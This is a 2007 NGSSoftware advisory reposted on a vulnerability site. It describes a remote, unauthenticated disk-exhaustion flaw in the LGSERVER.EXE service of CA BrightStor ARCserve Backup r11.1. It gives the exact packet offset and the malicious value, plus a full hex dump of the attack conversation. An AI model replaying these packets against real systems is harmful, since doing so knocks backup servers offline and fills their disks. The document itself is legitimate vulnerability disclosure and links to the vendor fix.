Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:15940
HistoryFeb 01, 2007 - 12:00 a.m.

Remote Unauthenticated Resource Exhaustion CA Mobile BackupService

2007-02-0100:00:00
vulners.com
4

=======
Summary

Today: 31 January 2007
Reference: NGS00401
Discover: Mark Litchfield; John Heasman
Name: Remote Unauthenticated Resource Exhaustion Mobile BackupService
Vendor: Computer Associates
Systems Affected: BrightStor ARCserve Backup for Laptops & Desktops r11.1
Risk: Medium
Status: Published

========
TimeLine

Discovered: 19 June 2006
Released: 19 June 2006
Approved: 19 June 2006
Reported: 22 June 2006
Fixed: 23 January 2007
Published: 30 January 2007

===========
Description

By sending a specially crafted series of packets to the LGSERVER.EXE
process that listens on TCP port 2200, it is possible to cause
LGSERVER.EXE to write very large files to the system disk. In addition,
the LGSERVER.EXE process becomes unresponsive until the file has been
written.

=================
Technical Details

Upon every authentication attempt to LGSERVER.EXE a file is created within
D:\CA_BABLDdata\Server\data\transfer. This file has an extention of .USX
which would take the format of something like (where X is equal to 0-9 or
A-F) - RWXXX.usx

During the negotiation, within the third packet at HEX address of (DWORD)
0x15 - 0x18, you will normally see the value 0x00 0x00 0x00 0x00 followed
by CoreDataDB.

When sending this packet the contents are written to this USX file.
However, if we pass a DWORD value of 0xff 0xff 0xff 0x7f at the address
0x15-0x18, we write an additional 2,096,153KB NULLS to the USX file.


Sample Conversation:

Client:- (Packet 1)

Raw Data
4e 3d 2c 1b 00 00 00 00 00 00 00 00 00 00 00 00 (N=, )
00 00 00 00 03 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 ( )

Server:-

Raw Data
4e 3d 2c 1b 00 00 00 00 fe 00 00 00 00 00 00 00 (N=, )
00 00 00 00 00 00 00 00 ( )

Server:-

Raw Data
4e 3d 2c 1b 00 00 00 00 ff 00 00 00 00 00 00 00 (N=, )
00 00 00 00 00 00 00 00 ( )

Client:- (Packet 2)

Raw Data
4e 3d 2c 1b 00 00 00 00 02 00 00 00 00 00 00 00 (N=, )
06 00 00 00 ce 03 00 00 52 57 31 42 34 00 ( RW1B4 )

Server:-

Raw Data
4e 3d 2c 1b 00 00 00 00 fe 00 00 00 00 00 00 00 (N=, )
00 00 00 00 00 00 00 00 ( )

Client:- (Packet 3)

Raw Data
4e 3d 2c 1b 00 00 00 00 03 00 00 00 00 00 00 00 (N=, )
ce 03 00 00 00 00 00 00 43 6f 72 65 44 61 74 61 ( CoreData)
44 42 00 00 01 00 00 00 00 00 0a 00 ce 03 00 00 (DB )
00 00 00 00 01 00 00 00 10 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 02 00 00 00 00 00 00 4a 00 00 00 00 00 ( J )
00 01 4a 02 00 00 00 00 00 00 00 00 00 00 00 00 ( J )
00 00 4a 02 00 00 00 00 00 00 50 00 00 00 00 00 ( J P )
00 01 9a 02 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 9a 02 00 00 00 00 00 00 52 00 00 00 00 00 ( R )
00 01 ec 02 00 00 00 00 00 00 04 00 00 00 00 00 ( )
00 00 f0 02 00 00 00 00 00 00 52 00 00 00 00 00 ( R )
00 01 42 03 00 00 00 00 00 00 0c 00 00 00 00 00 ( B )
00 00 4e 03 00 00 00 00 00 00 14 00 00 00 00 00 ( N )
00 02 62 03 00 00 00 00 00 00 04 00 00 00 00 00 ( b )
00 00 66 03 00 00 00 00 00 00 12 00 00 00 00 00 ( f )
00 02 78 03 00 00 00 00 00 00 04 00 00 00 00 00 ( x )
00 00 7c 03 00 00 00 00 00 00 0e 00 00 00 00 00 ( | )
00 02 8a 03 00 00 00 00 00 00 17 00 00 00 00 00 ( )
00 00 a1 03 00 00 00 00 00 00 11 00 00 00 00 00 ( )
00 02 b2 03 00 00 00 00 00 00 1c 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 ( )
00 00 01 00 00 00 03 00 00 00 f0 b4 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 01 00 00 00 04 00 00 00 06 00 43 6f 6e 66 ( Conf)
69 67 06 00 00 00 05 00 00 00 29 9f 07 00 00 00 (ig ) )
12 92 09 00 00 00 1f 9b 0b 00 00 00 57 92 0d 00 ( W )
00 00 b6 ad 0f 00 00 00 72 9c 00 00 00 00 00 00 ( r )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 03 00 00 00 06 00 00 00 08 00 55 73 65 72 ( User)
4e 61 6d 65 00 00 00 00 00 00 00 00 00 00 00 00 (Name )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 6d 61 72 6b 03 00 00 00 08 00 00 00 ( mark )
08 00 50 61 73 73 77 6f 72 64 00 00 00 00 00 00 ( Password )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 6a 86 fb b5 8d 2b ( j +)
1b a4 40 e1 b6 73 03 00 00 00 0a 00 00 00 0a 00 ( @ s )
55 73 65 72 53 74 61 74 75 73 11 00 00 00 03 00 (UserStatus )
00 00 0c 00 00 00 08 00 43 6f 64 65 50 61 67 65 ( CodePage)
e4 04 00 00 03 00 00 00 0e 00 00 00 04 00 48 6f ( Ho)
73 74 67 73 72 6c 2d 74 65 73 74 2e 67 73 72 6c (stgsrl-test.gsrl)
2d 74 65 73 74 2e 6e 65 74 03 00 00 00 10 00 00 (-test.net )
00 07 00 56 65 72 73 69 6f 6e 31 31 2e 31 2e 37 ( Version11.1.7)
34 32 3a 57 69 6e 64 6f 77 73 20 53 65 72 76 65 (42:Windows Serve)
72 20 32 30 30 33 (r 2003)

Client:- (Packet 4)

Raw Data
4e 3d 2c 1b 00 00 00 00 04 00 00 00 00 00 00 00 (N=, )
00 00 00 00 00 00 00 00 ( )

Server:-

Raw Data
4e 3d 2c 1b 00 00 00 00 fe 00 00 00 00 00 00 00 (N=, )
00 00 00 00 00 00 00 00 ( )

===============
Fix Information

http://supportconnectw.ca.com/public/sams/lifeguard/infodocs/babldimpsec-notice.asp

NGSSoftware Insight Security Research
http://www.ngssoftware.com
http://www.databasesecurity.com/
http://www.nextgenss.com/
+44(0)208 401 0070


E-MAIL DISCLAIMER

The information contained in this email and any subsequent
correspondence is private, is solely for the intended recipient(s) and
may contain confidential or privileged information. For those other than
the intended recipient(s), any disclosure, copying, distribution, or any
other action taken, or omitted to be taken, in reliance on such
information is prohibited and may be unlawful. If you are not the
intended recipient and have received this message in error, please
inform the sender and delete this mail and any attachments.

The views expressed in this email do not necessarily reflect NGS policy.
NGS accepts no liability or responsibility for any onward transmission
or use of emails and attachments having left the NGS domain.

NGS and NGSSoftware are trading names of Next Generation Security
Software Ltd. Registered office address: 52 Throwley Way, Sutton, SM1
4BF with Company Number 04225835 and VAT Number 783096402